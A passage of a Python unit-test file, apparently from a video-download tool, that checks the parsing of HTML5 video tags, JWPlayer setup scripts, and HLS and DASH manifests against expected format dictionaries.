'url': 'https://s-v2.tamasha.com/statics/videos_file/20/00/Kkdjw_200041c66f657fc967db464d156eafbc1ed9fe6f_n_144.mp4',
'ext': 'mp4',
'format_id': '144p',
'height': 144,
}]
})
# from https://www.directvnow.com
# with data-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video id="vid1" class="header--video-masked active" muted playsinline>
<source data-src="https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'ext': 'mp4',
'url': 'https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4',
}]
})
# from https://www.directvnow.com
# with data-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video id="vid1" class="header--video-masked active" muted playsinline>
<source data-src="https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'url': 'https://cdn.directv.com/content/dam/dtv/prod/website_directvnow-international/videos/DTVN_hdr_HBO_v3.mp4',
'ext': 'mp4',
}]
})
# from https://www.klarna.com/uk/
# with data-video-src
expect_dict(
self,
self.ie._parse_html5_media_entries(
'https://www.directvnow.com',
r'''
<video loop autoplay muted class="responsive-video block-kl__video video-on-medium">
<source src="" data-video-desktop data-video-src="https://www.klarna.com/uk/wp-content/uploads/sites/11/2019/01/KL062_Smooth3_0_DogWalking_5s_920x080_.mp4" type="video/mp4" />
</video>
''', None)[0],
{
'formats': [{
'url': 'https://www.klarna.com/uk/wp-content/uploads/sites/11/2019/01/KL062_Smooth3_0_DogWalking_5s_920x080_.mp4',
'ext': 'mp4',
}],
})
def test_extract_jwplayer_data_realworld(self):
# from http://www.suffolk.edu/sjc/
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script type='text/javascript'>
jwplayer('my-video').setup({
file: 'rtmp://192.138.214.154/live/sjclive',
fallback: 'true',
width: '95%',
aspectratio: '16:9',
primary: 'flash',
mediaid:'XEgvuql4'
});
</script>
''', None, require_title=False),
{
'id': 'XEgvuql4',
'formats': [{
'url': 'rtmp://192.138.214.154/live/sjclive',
'ext': 'flv'
}]
})
# from https://www.pornoxo.com/videos/7564/striptease-from-sexy-secretary/
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script type="text/javascript">
jwplayer("mediaplayer").setup({
'videoid': "7564",
'width': "100%",
'aspectratio': "16:9",
'stretching': "exactfit",
'autostart': 'false',
'flashplayer': "https://t04.vipstreamservice.com/jwplayer/v5.10/player.swf",
'file': "https://cdn.pornoxo.com/key=MF+oEbaxqTKb50P-w9G3nA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/4b2157147afe5efa93ce1978e0265289c193874e02597.flv",
'image': "https://t03.vipstreamservice.com/thumbs/pxo-full/2009-12/14/a4b2157147afe5efa93ce1978e0265289c193874e02597.flv-full-13.jpg",
'filefallback': "https://cdn.pornoxo.com/key=9ZPsTR5EvPLQrBaak2MUGA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/m_4b2157147afe5efa93ce1978e0265289c193874e02597.mp4",
'logo.hide': true,
'skin': "https://t04.vipstreamservice.com/jwplayer/skin/modieus-blk.zip",
'plugins': "https://t04.vipstreamservice.com/jwplayer/dock/dockableskinnableplugin.swf",
'dockableskinnableplugin.piclink': "/index.php?key=ajax-videothumbsn&vid=7564&data=2009-12--14--4b2157147afe5efa93ce1978e0265289c193874e02597.flv--17370",
'controlbar': 'bottom',
'modes': [
{type: 'flash', src: 'https://t04.vipstreamservice.com/jwplayer/v5.10/player.swf'}
],
'provider': 'http'
});
//noinspection JSAnnotator
invideo.setup({
adsUrl: "/banner-iframe/?zoneId=32",
adsUrl2: "",
autostart: false
});
</script>
''', 'dummy', require_title=False),
{
'thumbnail': 'https://t03.vipstreamservice.com/thumbs/pxo-full/2009-12/14/a4b2157147afe5efa93ce1978e0265289c193874e02597.flv-full-13.jpg',
'formats': [{
'url': 'https://cdn.pornoxo.com/key=MF+oEbaxqTKb50P-w9G3nA,end=1489689259,ip=104.199.146.27/ip=104.199.146.27/speed=6573765/buffer=3.0/2009-12/4b2157147afe5efa93ce1978e0265289c193874e02597.flv',
'ext': 'flv'
}]
})
# from http://www.indiedb.com/games/king-machine/videos
expect_dict(
self,
self.ie._extract_jwplayer_data(r'''
<script>
jwplayer("mediaplayer").setup({"abouttext":"Visit Indie DB","aboutlink":"http:\/\/www.indiedb.com\/","displaytitle":false,"autostart":false,"repeat":false,"title":"king machine trailer 1","sharing":{"link":"http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1","code":"<iframe width=\"560\" height=\"315\" src=\"http:\/\/www.indiedb.com\/media\/iframe\/1522983\" frameborder=\"0\" allowfullscreen><\/iframe><br><a href=\"http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1\">king machine trailer 1 - Indie DB<\/a>"},"related":{"file":"http:\/\/rss.indiedb.com\/media\/recommended\/1522983\/feed\/rss.xml","dimensions":"160x120","onclick":"link"},"sources":[{"file":"http:\/\/cdn.dbolical.com\/cache\/videos\/games\/1\/50\/49678\/encode_mp4\/king-machine-trailer.mp4","label":"360p SD","default":"true"},{"file":"http:\/\/cdn.dbolical.com\/cache\/videos\/games\/1\/50\/49678\/encode720p_mp4\/king-machine-trailer.mp4","label":"720p HD"}],"image":"http:\/\/media.indiedb.com\/cache\/images\/games\/1\/50\/49678\/thumb_620x2000\/king-machine-trailer.mp4.jpg","advertising":{"client":"vast","tag":"http:\/\/ads.intergi.com\/adrawdata\/3.0\/5205\/4251742\/0\/1013\/ADTECH;cors=yes;width=560;height=315;referring_url=http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1;content_url=http:\/\/www.indiedb.com\/games\/king-machine\/videos\/king-machine-trailer-1;media_id=1522983;title=king+machine+trailer+1;device=__DEVICE__;model=__MODEL__;os=Windows+OS;osversion=__OSVERSION__;ua=__UA__;ip=109.171.17.81;uniqueid=1522983;tags=__TAGS__;number=58cac25928151;time=1489683033"},"width":620,"height":349}).once("play", function(event) {
videoAnalytics("play");
}).once("complete", function(event) {
videoAnalytics("completed");
});
</script>
''', 'dummy'),
{
'title': 'king machine trailer 1',
'thumbnail': 'http://media.indiedb.com/cache/images/games/1/50/49678/thumb_620x2000/king-machine-trailer.mp4.jpg',
'formats': [{
'url': 'http://cdn.dbolical.com/cache/videos/games/1/50/49678/encode_mp4/king-machine-trailer.mp4',
'height': 360,
'ext': 'mp4'
}, {
'url': 'http://cdn.dbolical.com/cache/videos/games/1/50/49678/encode720p_mp4/king-machine-trailer.mp4',
'height': 720,
'ext': 'mp4'
}]
})
def test_parse_m3u8_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/11995
# http://teamcoco.com/video/clueless-gamer-super-bowl-for-honor
'img_bipbop_adv_example_fmp4',
'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
[{
'format_id': 'aud1-English',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/a1/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'language': 'en',
'ext': 'mp4',
'protocol': 'm3u8_native',
'audio_ext': 'mp4',
}, {
'format_id': 'aud2-English',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/a2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'language': 'en',
'ext': 'mp4',
'protocol': 'm3u8_native',
'audio_ext': 'mp4',
}, {
'format_id': 'aud3-English',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/a3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'language': 'en',
'ext': 'mp4',
'protocol': 'm3u8_native',
'audio_ext': 'mp4',
}, {
'format_id': '530',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 480,
'height': 270,
'vcodec': 'avc1.640015',
}, {
'format_id': '561',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 480,
'height': 270,
'vcodec': 'avc1.640015',
}, {
'format_id': '753',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 480,
'height': 270,
'vcodec': 'avc1.640015',
}, {
'format_id': '895',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 640,
'height': 360,
'vcodec': 'avc1.64001e',
}, {
'format_id': '926',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 640,
'height': 360,
'vcodec': 'avc1.64001e',
}, {
'format_id': '1118',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 640,
'height': 360,
'vcodec': 'avc1.64001e',
}, {
'format_id': '1265',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v4/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 768,
'height': 432,
'vcodec': 'avc1.64001e',
}, {
'format_id': '1295',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v4/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 768,
'height': 432,
'vcodec': 'avc1.64001e',
}, {
'format_id': '1487',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v4/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 768,
'height': 432,
'vcodec': 'avc1.64001e',
}, {
'format_id': '2168',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v5/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 960,
'height': 540,
'vcodec': 'avc1.640020',
}, {
'format_id': '2198',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v5/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 960,
'height': 540,
'vcodec': 'avc1.640020',
}, {
'format_id': '2390',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v5/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 960,
'height': 540,
'vcodec': 'avc1.640020',
}, {
'format_id': '3168',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v6/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1280,
'height': 720,
'vcodec': 'avc1.640020',
}, {
'format_id': '3199',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v6/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1280,
'height': 720,
'vcodec': 'avc1.640020',
}, {
'format_id': '3391',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v6/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1280,
'height': 720,
'vcodec': 'avc1.640020',
}, {
'format_id': '4670',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v7/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '4701',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v7/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '4893',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v7/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '6170',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v8/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '6200',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v8/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '6392',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v8/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '7968',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v9/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '7998',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v9/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}, {
'format_id': '8190',
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/v9/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/img_bipbop_adv_example_fmp4/master.m3u8',
'ext': 'mp4',
'protocol': 'm3u8_native',
'width': 1920,
'height': 1080,
'vcodec': 'avc1.64002a',
}],
{}
),
(
'bipbop_16x9',
'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
[{
'format_id': 'bipbop_audio-BipBop Audio 2',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/alternate_audio_aac/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'language': 'eng',
'ext': 'mp4',
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'vcodec': 'none',
'audio_ext': 'mp4',
'video_ext': 'none',
}, {
'format_id': '41',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear0/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 41.457,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'vcodec': 'none',
'acodec': 'mp4a.40.2',
'audio_ext': 'mp4',
'video_ext': 'none',
'abr': 41.457,
}, {
'format_id': '263',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear1/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 263.851,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 416,
'height': 234,
'vcodec': 'avc1.4d400d',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 263.851,
'abr': 0,
}, {
'format_id': '577',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear2/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 577.61,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 640,
'height': 360,
'vcodec': 'avc1.4d401e',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 577.61,
'abr': 0,
}, {
'format_id': '915',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear3/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 915.905,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 960,
'height': 540,
'vcodec': 'avc1.4d401f',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 915.905,
'abr': 0,
}, {
'format_id': '1030',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear4/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 1030.138,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 1280,
'height': 720,
'vcodec': 'avc1.4d401f',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 1030.138,
'abr': 0,
}, {
'format_id': '1924',
'format_index': None,
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/gear5/prog_index.m3u8',
'manifest_url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/bipbop_16x9_variant.m3u8',
'tbr': 1924.009,
'ext': 'mp4',
'fps': None,
'protocol': 'm3u8_native',
'preference': None,
'quality': None,
'width': 1920,
'height': 1080,
'vcodec': 'avc1.4d401f',
'acodec': 'mp4a.40.2',
'video_ext': 'mp4',
'audio_ext': 'none',
'vbr': 1924.009,
'abr': 0,
}],
{
'en': [{
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/eng/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}, {
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/eng_forced/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}],
'fr': [{
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/fra/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}, {
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/fra_forced/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}],
'es': [{
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/spa/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}, {
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/spa_forced/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}],
'ja': [{
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/jpn/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}, {
'url': 'https://devstreaming-cdn.apple.com/videos/streaming/examples/bipbop_16x9/subtitles/jpn_forced/prog_index.m3u8',
'ext': 'vtt',
'protocol': 'm3u8_native'
}],
}
),
]
for m3u8_file, m3u8_url, expected_formats, expected_subs in _TEST_CASES:
with io.open('./test/testdata/m3u8/%s.m3u8' % m3u8_file,
mode='r', encoding='utf-8') as f:
formats, subs = self.ie._parse_m3u8_formats_and_subtitles(
f.read(), m3u8_url, ext='mp4')
self.ie._sort_formats(formats)
expect_value(self, formats, expected_formats, None)
expect_value(self, subs, expected_subs, None)
def test_parse_mpd_formats(self):
_TEST_CASES = [
(
# https://github.com/ytdl-org/youtube-dl/issues/13919
# Also tests duplicate representation ids, see
# https://github.com/ytdl-org/youtube-dl/issues/15111
'float_duration',
'http://unknown/manifest.mpd', # mpd_url
None, # mpd_base_url
[{
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'm4a',
'format_id': '318597',
'format_note': 'DASH audio',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 61.587,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '318597',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.42001f',
'tbr': 318.597,
'width': 340,
'height': 192,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '638590',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.42001f',
'tbr': 638.59,
'width': 512,
'height': 288,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '1022565',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 1022.565,
'width': 688,
'height': 384,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '2046506',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.4d001f',
'tbr': 2046.506,
'width': 1024,
'height': 576,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '3998017',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.640029',
'tbr': 3998.017,
'width': 1280,
'height': 720,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': '5997485',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'none',
'vcodec': 'avc1.640032',
'tbr': 5997.485,
'width': 1920,
'height': 1080,
}],
{},
), (
# https://github.com/ytdl-org/youtube-dl/pull/14844
'urls_only',
'http://unknown/manifest.mpd', # mpd_url
None, # mpd_base_url
[{
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_144p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 200,
'width': 256,
'height': 144,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_240p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 400,
'width': 424,
'height': 240,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_360p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 800,
'width': 640,
'height': 360,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_480p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 1200,
'width': 856,
'height': 480,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_576p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 1600,
'width': 1024,
'height': 576,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_720p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 2400,
'width': 1280,
'height': 720,
}, {
'manifest_url': 'http://unknown/manifest.mpd',
'ext': 'mp4',
'format_id': 'h264_aac_1080p_m4s',
'format_note': 'DASH video',
'protocol': 'http_dash_segments',
'acodec': 'mp4a.40.2',
'vcodec': 'avc3.42c01e',
'tbr': 4400,
'width': 1920,
'height': 1080,
}],
{},
), (
# https://github.com/ytdl-org/youtube-dl/issues/20346
# Media considered unfragmented even though it contains
# Initialization tag
'unfragmented',
'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd', # mpd_url
'https://v.redd.it/hw1x7rcg7zl21', # mpd_base_url
[{
'url': 'https://v.redd.it/hw1x7rcg7zl21/audio',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'm4a',
'format_id': 'AUDIO-1',
'format_note': 'DASH audio',
'container': 'm4a_dash',
'acodec': 'mp4a.40.2',
'vcodec': 'none',
'tbr': 129.87,
'asr': 48000,
}, {
'url': 'https://v.redd.it/hw1x7rcg7zl21/DASH_240',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'mp4',
'format_id': 'VIDEO-2',
'format_note': 'DASH video',
'container': 'mp4_dash',
'acodec': 'none',
'vcodec': 'avc1.4d401e',
'tbr': 608.0,
'width': 240,
'height': 240,
'fps': 30,
}, {
'url': 'https://v.redd.it/hw1x7rcg7zl21/DASH_360',
'manifest_url': 'https://v.redd.it/hw1x7rcg7zl21/DASHPlaylist.mpd',
'ext': 'mp4',
'format_id': 'VIDEO-1',
'format_note': 'DASH video',
'container': 'mp4_dash',
'acodec': 'none',
'vcodec': 'avc1.4d401e',
'tbr': 804.261,
'width': 360,
'height': 360,
'fps': 30,
}],
{},
), (
'subtitles',
'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/manifest.mpd',
'https://sdn-global-streaming-cache-3qsdn.akamaized.net/stream/3144/files/17/07/672975/3144-kZT4LWMQw6Rh7Kpd.ism/',
[{
'format_id': 'audio=128001',
